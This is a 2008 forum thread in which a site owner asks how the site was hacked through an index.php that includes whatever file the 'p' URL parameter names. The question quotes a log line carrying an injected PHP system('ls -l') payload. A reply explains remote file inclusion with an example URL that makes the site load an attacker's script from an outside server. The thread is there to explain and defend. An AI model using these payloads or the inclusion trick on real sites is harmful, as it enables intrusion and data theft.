Site Security

dorianborg posted this at 11:34 — 20th January 2008.

They have: 1 posts

Joined: Jan 2008

Hi,

Recently my site was hacked/cracked apparently from my index.php file.

The links always point to index.php then I use a variable p to specify which file the website needs to load. for example if the user clicks on the Contact page, the link would be index.php?p=contact.php . Then I use the php include($p) in the index.php to load the contact page.

From the hacking log I have found strange unix coding... like:
"GET /styles/style1/tmon.png HTTP/1.1" 200 676 "http://*mydomain*/styles/style1.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127

 <? system(\"ls -l\") ?>

It is really possible for someone to hack a website from the URL?

is there a was to prevent these type of attacks, apart from blocking the ip from the htaccess?

pr0gr4mm3r posted this at 15:05 — 21st January 2008.

He has: 1,502 posts

Joined: Sep 2006

The way you have it set up, yes, it is possible to do some malicious things. I don't think that specific log entry was the culprit. I think your site was a victim of remote code execution.

The problem is that you're assuming that the user input is going to be valid, so you don't verify it. That $_GET input is actually easily changeable. If I had to get into a site that's setup like that, I would put a malicious PHP script on my server, let's say at http://www.example.com/bad/script.php. Then, I would go to your website and call up http://yoursite.com/index.php?p=http://www.example.com/bad/script.php

The PHP script that's being loaded from my server, could have any dangerous command that could scan your PHP code for database passwords or simply (but devastatingly) delete all your files.

knorr posted this at 15:35 — 22nd January 2008.